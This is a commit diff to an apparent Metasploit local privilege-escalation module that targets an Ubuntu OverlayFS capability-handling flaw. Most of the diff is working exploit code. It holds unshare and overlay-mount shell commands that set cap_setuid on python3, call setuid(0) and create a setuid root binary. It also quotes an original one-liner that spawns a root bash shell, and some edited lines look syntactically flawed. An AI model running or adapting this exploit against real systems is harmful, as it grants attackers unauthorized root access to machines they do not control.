Add missing call to setcap, fix description

Author: Corey

modules/exploits/linux/local/game_overlay_privesc.rb

@@ -19,7 +19,7 @@ def initialize(info = {})
             changes to the kernel by the Ubuntu development team __vfs_setxattr_noperm is 
             called during ovl_do_setxattr without calling the intermediate safety function 
             vfs_setxattr. Ultimatly this module allows for root access to be achieved by 
-            writing setuid capabilities to a file that are not santiized after being unioned 
+            writing setuid capabilities to a file which are not santiized after being unioned 
             with the upper mounted directory. 
         },
         'License' => MSF_LICENSE,
@@ -68,13 +68,6 @@ def check
     # Must be Ubuntu 
     fail_with(Failure::NotVulnerable, "Target is not Ubuntu.") unless kernel_version =~ /[uU]buntu/ 
 
-
-    unless userns_enabled?
-      return CheckCode::Safe "Unprivileged usernamespaces aren't permitted"
-    end 
-
-    vprint_good "Unprivileged usernames are permitted"
-
     os = cmd_exec "cat /etc/os-release"
 
     # grab codename i.e. Focal Fossa
@@ -110,9 +103,9 @@ def execute_command(cmd, opts = {})
     # Should we make sure directory doesn't already exist?
 
     directories.each do |dir|
-      print_status "Creating directory #{d}"
-      cmd_exec "mkdir -p #{d}"
-      register_dir_for_cleanup d
+      print_status "Creating directory #{dir}"
+      cmd_exec "mkdir -p #{dir}"
+      register_dir_for_cleanup dir
     end
 
 
@@ -124,7 +117,7 @@ def execute_command(cmd, opts = {})
 
    print_status "Starting new namespace, and running exploit..."
 
-   hack = "unshare -rm sh -c \"cap_setuid+eip /tmp/main/low/python3; mount -t overlay overlay -o rw, lowerdir=/tmp/main/low,upperdir=/tmp/main/up,workdir=/tmp/main/work mnt touch mnt/* && /tmp/main/up/python3 -c 'import os;os.setuid(0);os.system(\"chown root:root /tmp/main/low/marv && chmod u+s /tmp/main/low/marv && /tmp/main/marv\")\" "
+   hack = "unshare -rm sh -c \"setcap cap_setuid+eip /tmp/main/low/python3; mount -t overlay overlay -o rw, lowerdir=/tmp/main/low, upperdir=/tmp/main/up, workdir=/tmp/main/work mnt && touch mnt/* && /tmp/main/up/python3 -c 'import os;os.setuid(0);os.system(\"chown root:root /tmp/main/low/marv && chmod+x /tmp/main/marv && /tmp/main/marv \")\" "
 
     # g1vi original 
     # "unshare -rm sh -c \"mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;\" && u/python3 -c 'import os;os.setuid(0);os.system(\"cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash\")'"